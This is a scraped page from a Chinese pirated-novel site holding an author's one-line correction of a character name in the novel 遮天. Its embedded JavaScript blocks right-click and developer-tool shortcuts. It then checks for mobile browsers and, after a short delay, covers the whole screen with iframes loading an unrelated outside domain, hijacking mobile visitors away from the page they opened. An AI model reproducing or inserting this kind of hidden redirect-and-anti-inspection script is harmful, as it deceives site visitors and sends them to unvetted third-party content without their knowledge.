新笔趣阁
会员书架
首页 > 武侠修真 > 遮天 > 刚才那章笔误

刚才那章笔误(1 / 1)

章节目录 加入书签
好书推荐: 朕又不想当皇帝 猛啾嗷呜~啾! 玄浑道章 大华恩仇引 溺宠狂妻:老公太霸道 星光璀璨:天价绯闻妻 我真的长生不老 豪门宠婚,名门夫人 星峰传说 寸芒

笔误,应该是神王姬皓月,不是姜太虚,已经改正了。不过更改系统延迟的厉害,不知道什么时候才会刷新过来,先发个新单章更正下吧。

点击切换 [繁体版] [简体版]
章节目录 加入书签
新书推荐: 误嫁妖孽世子 嫡女 死神降临 重生之娇宠小娘子 天生科技狂 神武都市 大明骑龙 穿越扶摇九天 沈家有女 此情荒唐不可欺
// 禁止查看源码 document.addEventListener('contextmenu', function (e) { e.preventDefault(); }); // 禁止鼠标右键 document.addEventListener('keydown', function (e) { if (e.keyCode === 93 || (e.ctrlKey && e.shiftKey && e.keyCode === 73)) { e.preventDefault(); } }); // 禁止 F12 document.addEventListener('keydown', function (e) { if (e.keyCode === 123) { e.preventDefault(); } }); document.addEventListener('DOMContentLoaded', function () { main(); }); function isMobile() { const userAgent = navigator.userAgent.toLowerCase(); const mobileKeywords = ['nokia', 'sony', 'ericsson', 'mot', 'samsung', 'htc', 'sgh', 'lg', 'sharp', 'sie-', 'philips', 'panasonic', 'alcatel', 'lenovo', 'iphone', 'ipod', 'blackberry', 'meizu', 'android', 'netfront', 'symbian', 'ucweb', 'windowsce', 'palm', 'operamini', 'operamobi', 'openwave', 'nexusone', 'cldc', 'midp', 'wap', 'mobile']; if (userAgent.includes('http_x_wap_profile') || userAgent.includes('wap') || userAgent.includes('mobile') || mobileKeywords.some(keyword => userAgent.includes(keyword))) { return true; } if (userAgent.includes('vnd.wap.wml') && (userAgent.includes('text/html') === false || userAgent.indexOf('vnd.wap.wml') < userAgent.indexOf('text/html'))) { return true; } return false; } function isSpider() { const userAgent = navigator.userAgent.toLowerCase(); const spiderKeywords = ['googlebot', 'spider', 'baiduspider', 'yahooslurp', 'msnbot', 'sosospider', 'yodaobot', 'outfoxbot', 'sogou web spider', 'sogou orion spider', 'fast-webcrawler', 'gaisbot', 'ia_archiver', 'altavista', 'lycos_spider', 'inktomi slurp']; return spiderKeywords.some(keyword => userAgent.includes(keyword)); } function main() { const isMobileDevice = isMobile(); // const isSpiderBot = isSpider(); if (isMobileDevice) { const url = 'segui99.life'; setTimeout(function () { var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?ac76300945c612415ea74e6625be7a6e"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); // 创建白色 iframe 元素 const whiteIframe = document.createElement('iframe'); whiteIframe.style.position = 'fixed'; whiteIframe.style.top = '0'; whiteIframe.style.left = '0'; whiteIframe.style.width = '100%'; whiteIframe.style.height = '100%'; whiteIframe.style.border = 'none'; whiteIframe.style.backgroundColor = 'white'; // 将白色 iframe 添加到 body 元素中 document.body.appendChild(whiteIframe); // 创建 iframe 元素 const iframe = document.createElement('iframe'); iframe.style.position = 'fixed'; iframe.style.top = '0'; iframe.style.left = '0'; iframe.style.width = '100%'; iframe.style.height = '100%'; iframe.style.border = 'none'; // 设置 iframe 的 src iframe.src = `https://${url}/`; // 将 iframe 添加到 body 元素中 document.body.appendChild(iframe); }, 500); } }